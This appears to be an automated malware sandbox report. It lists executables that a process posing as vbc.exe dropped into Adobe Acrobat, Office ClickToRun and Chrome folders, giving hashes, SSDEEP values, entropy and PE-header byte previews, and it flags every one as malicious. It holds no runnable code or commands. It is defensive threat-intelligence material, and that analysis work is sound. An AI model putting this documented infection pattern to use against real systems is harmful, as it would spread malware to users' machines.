                                                                                                                                                                    SHA-256:D2F8D25096210E98C8F16DBADE29D6186B3C764D04EDDF85E4E3E7A6C932D447
                                                                                                                                                                    SHA-512:7E7646D3436017E3D43ECDB539F7188CABE6DAC8D325A788437B02B25C57AB29F60DC366A28DDD7F5A00FC02456D554417E54DCADCA519D4C0BB9FEF2A0328A6
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@.....................................w.... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...P.......@...2..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1161728
                                                                                                                                                                    Entropy (8bit):5.047174220454958
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:RUXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:GsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:52995FB55FB7CFFB2C0D5D3CC45F4C41
                                                                                                                                                                    SHA1:2A4EC318F35859ACC74C3C6EEA7585225FE77368
                                                                                                                                                                    SHA-256:35E9D03417E856C16812BA842D3A3D8136A99EDD9AF2F8DBD36BDB82E644ECA6
                                                                                                                                                                    SHA-512:24D47B2B4C400D97982723918224AEC3DCFE52E395708EF398B12FFBB2B56EEF8339B0E51D964A99B8317292B172571C49156FA9A6F0A27AE8BE24F18F1C3E29
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.....................................E.... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...P.......@...z..............@...........................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4151808
                                                                                                                                                                    Entropy (8bit):6.499787057734289
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:ntuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755xDmg27RN:njEIa4HIEWOc53D527BWG
                                                                                                                                                                    MD5:141EDACAF70B481E1C3D9354978F03A4
                                                                                                                                                                    SHA1:47A5AD1D23F9150110698FF6633576145A050E72
                                                                                                                                                                    SHA-256:40AD6CFECAE026376BC506A690512124E2132734BB92CC492179DB604F8B97C3
                                                                                                                                                                    SHA-512:56912476E62B1A94568965CB917418A3E40CB9DB4C3815D48792351191E14B49BF817A1D03399D3B96700FEA1D6008F3165538E2EEDF6C7221C7098AC6F4C1FC
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @....../@... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):59941376
                                                                                                                                                                    Entropy (8bit):7.99936733426603
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:1572864:1Qb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:uXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                    MD5:10389E883940C208AF0DBF79E346AA82
                                                                                                                                                                    SHA1:52FB17E12AF21EA9513B047354CB7A9871A7D157
                                                                                                                                                                    SHA-256:6FB28F41B680B798E3301C0E7184E9AF7DE68BA49F0488B808A950C6001CED87
                                                                                                                                                                    SHA-512:7DFB4195506250D19918ED0D07E757DB6FE492F75C93325E0EFFFC72E70616DCF3BA6F10DDCB732AE01E7C49439AB1B34B5906CB7137BB4699483F6AE2A446B4
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0............ .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1230336
                                                                                                                                                                    Entropy (8bit):5.185609431094396
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:mejVWYUAUXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:DjkY7UsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:DDF18AEA49B04A30411A7FA6F181A82D
                                                                                                                                                                    SHA1:89C6F4A59AEA0160DA0FFABEF4AB9464E2C934C8
                                                                                                                                                                    SHA-256:8EE8B79EFCE9739FBBDDDA6BA65186874A24A6FDBD57DA539BF6CCFF2B92F2D1
                                                                                                                                                                    SHA-512:AEC030FAE6B4B4E7943204911DD630A2D6B6FD89736295AC0C9B0B27C855EC396518AEAF8511FD5894C22258F7222A39DB39599A3ECA201297443A6B02A95D33
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@.................................=Z.......................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1384960
                                                                                                                                                                    Entropy (8bit):5.377835155980864
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:1xwSJhkrmZsosqjnhMgeiCl7G0nehbGZpbD:1y+krKsUDmg27RnWGj
                                                                                                                                                                    MD5:2FFD59B4636F6760B30B1E109632C201
                                                                                                                                                                    SHA1:729AEF99A27A44AE3A9D35E7779A69EE82584CFE
                                                                                                                                                                    SHA-256:F6BA77CD80DFDE6C43938C8F2723DFF1E60557A090ECFC6B750024BA7E2D7823
                                                                                                                                                                    SHA-512:E95B6061E72C480E542EFF01C1D26875964710F056DEF02D158EE6ED4E853B515870E4EBAB077B35AFEC0BA6206856E48949508C1F8AA587354C721123891126
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@......................................... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1649152
                                                                                                                                                                    Entropy (8bit):5.632746320404695
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:JHQJLIRgvsnN5sqjnhMgeiCl7G0nehbGZpbD:JHQJL349Dmg27RnWGj
                                                                                                                                                                    MD5:115B0775DDF7AC56CC75908D3F500172
                                                                                                                                                                    SHA1:A431073986A6105CA4E1C4E77335387550FFFAC0
                                                                                                                                                                    SHA-256:67EB7CDFDBB6AD17C9F6ADDE61F167EC93E00DA80C9D7005516426ECB37D4D1A
                                                                                                                                                                    SHA-512:DB12BFBAC4C185026479D9F9E30454EB2700FD28E16119DFC3829F6D9EE8AF4ADD744A04C7889BACE497F7712CB57F05FF81FD321A8AE4FB5FF8AF2F5D912403
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@.....................................8.... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):5365760
                                                                                                                                                                    Entropy (8bit):6.450977550702275
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:BUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1ko:mWmXL6DEC7dRpKuDQbgSD527BWG
                                                                                                                                                                    MD5:C37FACD897A1D9BE9B8999DB058512E7
                                                                                                                                                                    SHA1:455EE52581909FE51D23B07E7B63D93F751CFE48
                                                                                                                                                                    SHA-256:B9D5C10F69676C09D1B71E94A188F76C4D00F2922B3749AFB5D7C273A72BB278
                                                                                                                                                                    SHA-512:C87F227DF08D71A199069B2D6BC2822F3BB066447463A6DCCA4C7DB4A3E4CB95F269DD422CFD2689EED38ACF99115C15B1392A7577B1B5C581A8817539FAC003
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.......R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):3163136
                                                                                                                                                                    Entropy (8bit):7.972783202893685
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:6rZ23AbsK6Ro022JjL2WEiVqJZRD527BWG:0JADmmxL2WEoCZRVQBWG
                                                                                                                                                                    MD5:5A7B5E67A247F3621D2A1A5B724F23D6
                                                                                                                                                                    SHA1:204C598743000E8E140BA26FC7DC179996D0CA09
                                                                                                                                                                    SHA-256:8C48BE8A358C031435172B8CCD0FAABB4D25D350E6DFE108CB5E633B73A4D729
                                                                                                                                                                    SHA-512:CB5AC1806DD234C88235C4C937C84C5A5285B6F6ED0A5E875FCB1394BCB8E58580050C1357727D4EBA3C401D73FB8A87990C3DFCE731AC68EC11664540A83CEF
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1.......0.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1213440
                                                                                                                                                                    Entropy (8bit):7.204931137690633
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:0frYY42wd7hlOw9fpkEE644sqjnhMgeiCl7G0nehbGZpbD:Jz9xrSkDmg27RnWGj
                                                                                                                                                                    MD5:034B1834FF4C694072EBCFEA9339232A
                                                                                                                                                                    SHA1:85F144F4273BAA9205EB97C0AA22D269C43A52DD
                                                                                                                                                                    SHA-256:EE57B9DB3307DCF36C6E3C31B2679B64EF8C4504274D26B8D8DC60A39F4E56B2
                                                                                                                                                                    SHA-512:1391A90200E726EB8EC72BA6408C62C9C0C7390BC59FAA98BC59EA63A475B662DA473B012465E909AF3BAFF96831933C92E18C859D092184A6524D82473EAB0C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. .......E.... ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1388544
                                                                                                                                                                    Entropy (8bit):5.272952915922038
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:DwkNKiZ+R2GGNUbTF5zXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:DzNKUE5zsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:8D348E51F8069BC0B8AF286A2D8796A8
                                                                                                                                                                    SHA1:0BF2B4901018FE940CA9D5D6C628F86A68329BAA
                                                                                                                                                                    SHA-256:B49942764D3DB10349AA5F4CC0A79B0046776E79265DE87AC53BDA120C4F871E
                                                                                                                                                                    SHA-512:7E804C14EDB0BCF3760E0C85D518F569630477F76B0CDE3BBAC08146FAC38DF977023B4EB60A59312593ACCE783D5C5AD222D414EA3F07F6AB0D1D912902673F
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P.......5.... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):5855744
                                                                                                                                                                    Entropy (8bit):6.574343016884408
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:TALuzDKnxCp3JKNrPJzruaI6HMaJTtGbGD527BWG:EaGg3cFPIaI6HMaJTtGbGVQBWG
                                                                                                                                                                    MD5:B81AFC19C9D8BAAC5570BE09B27B0A0F
                                                                                                                                                                    SHA1:95FEAD3A67B7599EDEF06F24C4CCBA2CE0622F00
                                                                                                                                                                    SHA-256:225F99363C6166116A7012ADBB35B6E06B790C9A59CE49B54698524899BE048A
                                                                                                                                                                    SHA-512:C5796A69CDF1DA8A6037CFD7F79CB416F4FD1DBA946509F7CE14629F59376BC082C221552D0CD9904D229C3D18FC5D29B07309AE32396D7912685FDAC9949746
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.....#EZ... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

                                                                                                                                                                    C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1312768
                                                                                                                                                                    Entropy (8bit):5.3560930813389245
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:oXr/SVMxW8sqjnhMgeiCl7G0nehbGZpbD:o1xRDmg27RnWGj
                                                                                                                                                                    MD5:EC709FE78BFAEFFDDE20A122069F98DE
                                                                                                                                                                    SHA1:782CF3B53FD15EE360676EACB6FEE5C8F5518AB4
                                                                                                                                                                    SHA-256:50864D30049CFEA867E6559E260289C7E40F1AB11171B494CB8DF1A34DD3EDB2
                                                                                                                                                                    SHA-512:4C82C5B9F89E96C1A93F3D30BCED95BEEF9992C209D3BDDD7EED089CBC12E5EB62FFBA58B03639CB3B681FA94A238082B9C6F8C0B00425C0F78C4EBC4CFCA395
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P......."........... ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):27533312
                                                                                                                                                                    Entropy (8bit):6.248638638842956
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:196608:FhRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOCVQBWG:FhRCpGpMJMrbp8JjpNdNlc5eB
                                                                                                                                                                    MD5:CD76A471F612BCB209F792AAFC4CF23D
                                                                                                                                                                    SHA1:FE6D2D172717FB32280D939B324EA37D2C8EDADF
                                                                                                                                                                    SHA-256:AF1A0F40D0B871A3C52730A7DB1E30F056D854D8EC948D05405331D792B5D8FF
                                                                                                                                                                    SHA-512:DB0C619FB11E7C5A08621C646402158DCD59F4CD15DF526429F8F47C1CD156090568D7867E7ED0A43F9ABE7E9D2CCC94A76BCA73BC07A933B7CC5407FD75B3EF
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@......................................... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

                                                                                                                                                                    C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2199552
                                                                                                                                                                    Entropy (8bit):6.789021967279555
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:z83pZ3kd0CuEeN0LUmRXzYs65maDmg27RnWGj:DKuUQY15tD527BWG
                                                                                                                                                                    MD5:4614C8E1636BF858FCE3109AF7B7AA4D
                                                                                                                                                                    SHA1:531C759D91C3606CE34A4028FF6FAE756D1486E8
                                                                                                                                                                    SHA-256:28264F8CE4166D27ECE456949FD0284F605FC1B6B72AA7AFC65730B2BC25BDE8
                                                                                                                                                                    SHA-512:EAEEFD05ACF7C6B4E3EBA8982D965F2910789DC2892359C213FD6D79F4B73FEEE2DC427B74BB048EFD11885503D879646734A768348603B859F599E7DFF1C1A0
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!......S"... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4971008
                                                                                                                                                                    Entropy (8bit):6.670844489289887
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:HErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+MZ:xA4oGlcR+glEdOPKzgVZID527BWG
                                                                                                                                                                    MD5:1AF4DAAD397237F74EC085E35D33F45D
                                                                                                                                                                    SHA1:D4CE8433E8A47BA59F65B3420E83AB5622036F88
                                                                                                                                                                    SHA-256:FDD661353F34AAE604EC854668CA916A6AF67C21B6B7F43333BBF6AAA7E7F6CD
                                                                                                                                                                    SHA-512:613BDCDDB4554A53C4B0D3DAC96046CE6EEC29C7199BF7FD8D8D5413391A4CC69E78F2348AD77FD3B2BF4A101E1CC651A272C4993EDF290F41BD7A685D74836D
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L......;L... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4897792
                                                                                                                                                                    Entropy (8bit):6.82977249855355
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:v8ErDqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKj:kv2gM+qwXLg7pPgw/DSZ9PD527BWG
                                                                                                                                                                    MD5:D53A28F6CEFA448F5476D1530EE7B504
                                                                                                                                                                    SHA1:32F272DB73C96BA6F6B167E51A61B950DD0F67DE
                                                                                                                                                                    SHA-256:85B2AEEE79ABB3CABD8F3D0368F26C66915DA14779F69DD79BC850120937A397
                                                                                                                                                                    SHA-512:1C1731945EAE36FEF022CC0838DD387788DF6DF8A70D4806B216A64E9E29A9FAACBB46BC93BCB805728E28331664203EC1310DA3A619A6A62DFAA3EEFCE0756B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
